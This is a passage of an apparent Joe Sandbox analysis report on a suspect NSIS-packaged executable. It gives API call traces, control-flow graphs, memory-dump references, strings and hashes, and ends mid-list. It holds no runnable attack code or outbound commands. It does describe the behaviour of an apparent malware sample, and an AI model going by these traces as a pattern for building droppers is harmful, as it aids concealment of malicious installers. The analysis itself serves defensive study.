403b70-403b79 call 403839 357->361 361->327
                              APIs
                                • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                              • lstrcatA.KERNEL32(1033,symphonized: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,symphonized: Installing,00000000,00000002,75A33410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\1ppvR5VRT6.exe",00000000), ref: 00403964
                              • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing,1033,symphonized: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,symphonized: Installing,00000000,00000002,75A33410), ref: 004039D9
                              • lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
                              • GetFileAttributesA.KERNEL32(Call), ref: 004039F7
                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing), ref: 00403A40
                                • Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004
                              • RegisterClassA.USER32(00423EC0), ref: 00403A7D
                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A95
                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403ACA
                              • ShowWindow.USER32(00000005,00000000), ref: 00403B00
                              • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B2C
                              • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B39
                              • RegisterClassA.USER32(00423EC0), ref: 00403B42
                              • DialogBoxParamA.USER32(?,00000000,00403C86,00000000), ref: 00403B61
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                              • String ID: "C:\Users\user\Desktop\1ppvR5VRT6.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$symphonized: Installing
                              • API String ID: 1975747703-1472905453
                              • Opcode ID: e3ec59447a3a5e7c0f5e833dcd66e45d6aae208e89073c804757ba1de371f7ae
                              • Instruction ID: 64417a43097117c8645ac50bcac1ff1732ece6e83d5d80f238bcb810e00f0866
                              • Opcode Fuzzy Hash: e3ec59447a3a5e7c0f5e833dcd66e45d6aae208e89073c804757ba1de371f7ae
                              • Instruction Fuzzy Hash: 8F61B770340604AED620AF65AD45F3B3A6CDB8575AF40453FF991B22E2CB7D9D028E2D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 364 402d98-402de6 GetTickCount GetModuleFileNameA call 405c32 367 402df2-402e20 call 406099 call 405a78 call 406099 GetFileSize 364->367 368 402de8-402ded 364->368 376 402f10-402f1e call 402cf9 367->376 377 402e26-402e3d 367->377 369 403037-40303b 368->369 383 402f24-402f27 376->383 384 402fef-402ff4 376->384 379 402e41-402e4e call 4032af 377->379 380 402e3f 377->380 388 402e54-402e5a 379->388 389 402fab-402fb3 call 402cf9 379->389 380->379 386 402f53-402f9f GlobalAlloc call 406556 call 405c61 CreateFileA 383->386 387 402f29-402f41 call 4032c5 call 4032af 383->387 384->369 414 402fa1-402fa6 386->414 415 402fb5-402fe5 call 4032c5 call 40303e 386->415 387->384 412 402f47-402f4d 387->412 393 402eda-402ede 388->393 394 402e5c-402e74 call 405bed 388->394 389->384 397 402ee0-402ee6 call 402cf9 393->397 398 402ee7-402eed 393->398 394->398 411 402e76-402e7d 394->411 397->398 403 402f00-402f0a 398->403 404 402eef-402efd call 4064e8 398->404 403->376 403->377 404->403 411->398 416 402e7f-402e86 411->416 412->384 412->386 414->369 424 402fea-402fed 415->424 416->398 417 402e88-402e8f 416->417 417->398 419 402e91-402e98 417->419 419->398 421 402e9a-402eba 419->421 421->384 423 402ec0-402ec4 421->423 425 402ec6-402eca 423->425 426 402ecc-402ed4 423->426 424->384 427 402ff6-403007 424->427 425->376 425->426 426->398 428 402ed6-402ed8 426->428 429 403009 427->429 430 40300f-403014 427->430 428->398 429->430 431 403015-40301b 430->431 431->431 432 40301d-403035 call 405bed 431->432 432->369
                              APIs
                              • GetTickCount.KERNEL32 ref: 00402DAC
                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1ppvR5VRT6.exe,00000400), ref: 00402DC8
                                • Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\1ppvR5VRT6.exe,80000000,00000003), ref: 00405C36
                                • Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                              • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\1ppvR5VRT6.exe,C:\Users\user\Desktop\1ppvR5VRT6.exe,80000000,00000003), ref: 00402E11
                              • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 00402F58
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                              • String ID: "C:\Users\user\Desktop\1ppvR5VRT6.exe"$12$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\1ppvR5VRT6.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                              • API String ID: 2803837635-1094673745
                              • Opcode ID: 4785f0ebff018845c403b6ca7344f0ae65bd881e692373c18b1951fa0e6bcd5c
                              • Instruction ID: 415a6227fd12514a0fe47228c9aaee062227cda2d2dbc78d85e3b2e5f7ba07c2
                              • Opcode Fuzzy Hash: 4785f0ebff018845c403b6ca7344f0ae65bd881e692373c18b1951fa0e6bcd5c
                              • Instruction Fuzzy Hash: 2561B271A40205ABDB20EF64DE89B9E7AB8EB40358F20413BF514B62D1DB7C99419B9C

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 435 4060bb-4060c6 436 4060c8-4060d7 435->436 437 4060d9-4060ef 435->437 436->437 438 4062e0-4062e4 437->438 439 4060f5-406100 437->439 441 406112-40611c 438->441 442 4062ea-4062f4 438->442 439->438 440 406106-40610d 439->440 440->438 441->442 443 406122-406129 441->443 444 4062f6-4062fa call 406099 442->444 445 4062ff-406300 442->445 446 4062d3 443->446 447 40612f-406163 443->447 444->445 449 4062d5-4062db 446->449 450 4062dd-4062df 446->450 451 406280-406283 447->451 452 406169-406173 447->452 449->438 450->438 455 4062b3-4062b6 451->455 456 406285-406288 451->456 453 406175-406179 452->453 454 40618d 452->454 453->454 459 40617b-40617f 453->459 462 406194-40619b 454->462 457 4062c4-4062d1 lstrlenA 455->457 458 4062b8-4062bf call 4060bb 455->458 460 406298-4062a4 call 406099 456->460 461 40628a-406296 call 405ff7 456->461 457->438 458->457 459->454 464 406181-406185 459->464 471 4062a9-4062af 460->471 461->471 466 4061a0-4061a2 462->466 467 40619d-40619f 462->467 464->454 472 406187-40618b 464->472 469 4061a4-4061bf call 405f80 466->469 470 4061db-4061de 466->470 467->466 478 4061c4-4061c7 469->478 476 4061e0-4061ec GetSystemDirectoryA 470->476 477 4061ee-4061f1 470->477 471->457 475 4062b1 471->475 472->462 479 406278-40627e call 406303 475->479 480 406262-406265 476->480 481 4061f3-406201 GetWindowsDirectoryA 477->481 482 40625e-406260 477->482 483 406267-40626b 478->483 484 4061cd-4061d6 call 4060bb 478->484 479->457 480->479 480->483 481->482 482->480 485 406203-40620d 482->485 483->479 488 40626d-406273 lstrcatA 483->488 484->480 490 406227-40623d SHGetSpecialFolderLocation 485->490 491 40620f-406212 485->491 488->479 492 40625b 490->492 493 40623f-406259 SHGetPathFromIDListA CoTaskMemFree 490->493 491->490 495 406214-40621b 491->495 492->482 493->480 493->492 496 406223-406225 495->496 496->480 496->490
                              APIs
                              • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004061E6
                              • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,004051F8,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000), ref: 004061F9
                              • SHGetSpecialFolderLocation.SHELL32(004051F8,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,004051F8,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000), ref: 00406235
                              • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406243
                              • CoTaskMemFree.OLE32(00000000), ref: 0040624F
                              • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406273
                              • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,004051F8,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004062C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                              • API String ID: 717251189-4067331686
                              • Opcode ID: ab93b42b91f91bae910e6fac62c15208670ece31f71cd1d64f2b49d88cab81d9
                              • Instruction ID: 009d83548d98726144a2e54fa316bc550aecd198e2c9f4ca7d92c8f0a1cd1b24
                              • Opcode Fuzzy Hash: ab93b42b91f91bae910e6fac62c15208670ece31f71cd1d64f2b49d88cab81d9
                              • Instruction Fuzzy Hash: 7361F271900105AEDF20AF64C894B7A3BA4EB56710F1241BFE913BA2D1C77C8962CB4E

                              Control-flow Graph

                              APIs
                              • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing,00000000,00000000,00000031), ref: 00401798
                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing,00000000,00000000,00000031), ref: 004017C2
                                • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                • Part of subcall function 004051C0: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00402D70,00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000), ref: 0040521C
                                • Part of subcall function 004051C0: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll), ref: 0040522E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                              • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing$C:\Users\user\AppData\Local\Temp\nskABB0.tmp$C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll$Call
                              • API String ID: 1941528284-784404680
                              • Opcode ID: e928e46396d8dc3c4a4bdb24082dd825f8b0ff1d663bcc8c2bbd70b8c757518f
                              • Instruction ID: 2c94bdb1ed45b9066cdaff59bd30f99cb4fab6046a6a22cdc065c2defd4e90a3
                              • Opcode Fuzzy Hash: e928e46396d8dc3c4a4bdb24082dd825f8b0ff1d663bcc8c2bbd70b8c757518f
                              • Instruction Fuzzy Hash: CD41D871A00615BBCB10BFB5CC45EAF3669EF01329B21823FF522B10E1D77C89518A6E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 4051c0-4051d5 634 40528b-40528f 633->634 635 4051db-4051ed 633->635 636 4051f8-405204 lstrlenA 635->636 637 4051ef-4051f3 call 4060bb 635->637 639 405221-405225 636->639 640 405206-405216 lstrlenA 636->640 637->636 641 405234-405238 639->641 642 405227-40522e SetWindowTextA 639->642 640->634 643 405218-40521c lstrcatA 640->643 644 40523a-40527c SendMessageA * 3 641->644 645 40527e-405280 641->645 642->641 643->639 644->645 645->634 646 405282-405285 645->646 646->634
                              APIs
                              • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                              • lstrlenA.KERNEL32(00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                              • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00402D70,00402D70,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,00000000,00000000,00000000), ref: 0040521C
                              • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll), ref: 0040522E
                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dll
                              • API String ID: 2531174081-39926261
                              • Opcode ID: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
                              • Instruction ID: 0096fbd02e39835f1f24d83275f9c38cb3dbb50e4440d35a5143882a1b4174d0
                              • Opcode Fuzzy Hash: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
                              • Instruction Fuzzy Hash: 4D218C71900518BFDF119FA5DD84A9EBFB9FF04354F0480BAF904B6291C7798A418FA8

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 647 405686-4056d1 CreateDirectoryA 648 4056d3-4056d5 647->648 649 4056d7-4056e4 GetLastError 647->649 650 4056fe-405700 648->650 649->650 651 4056e6-4056fa SetFileSecurityA 649->651 651->648 652 4056fc GetLastError 651->652 652->650
                              APIs
                              • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
                              • GetLastError.KERNEL32 ref: 004056DD
                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004056F2
                              • GetLastError.KERNEL32 ref: 004056FC
                              Strings
                              • C:\Users\user\Desktop, xrefs: 00405686
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004056AC
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                              • API String ID: 3449924974-1700792911
                              • Opcode ID: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                              • Instruction ID: f1d10c799bfca9e4ec05a1b7c6bbaf57c6c97cfabee98fddb41b1e3f6ffc1dc8
                              • Opcode Fuzzy Hash: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                              • Instruction Fuzzy Hash: 13010871D10259EADF109FA4C9047EFBFB8EB14315F10447AD544B6290DB7A9604CFA9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 653 4063c3-4063e3 GetSystemDirectoryA 654 4063e5 653->654 655 4063e7-4063e9 653->655 654->655 656 4063f9-4063fb 655->656 657 4063eb-4063f3 655->657 659 4063fc-40642e wsprintfA LoadLibraryExA 656->659 657->656 658 4063f5-4063f7 657->658 658->659
                              APIs
                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                              • wsprintfA.USER32 ref: 00406413
                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: DirectoryLibraryLoadSystemwsprintf
                              • String ID: %s%s.dll$UXTHEME$\
                              • API String ID: 2200240437-4240819195
                              • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                              • Instruction ID: c4678dfb2da91d08484603cd09ba86b434f6c063b959f4a2bfe8732341513f46
                              • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                              • Instruction Fuzzy Hash: 69F0FC7054060967DB149768DD0DFEB365CEB08304F14057EA587E10D1D978D8358B98

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 405c61-405c6b 661 405c6c-405c97 GetTickCount GetTempFileNameA 660->661 662 405ca6-405ca8 661->662 663 405c99-405c9b 661->663 665 405ca0-405ca3 662->665 663->661 664 405c9d 663->664 664->665
                              APIs
                              • GetTickCount.KERNEL32 ref: 00405C75
                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405C8F
                              Strings
                              • "C:\Users\user\Desktop\1ppvR5VRT6.exe", xrefs: 00405C61
                              • nsa, xrefs: 00405C6C
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C64
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
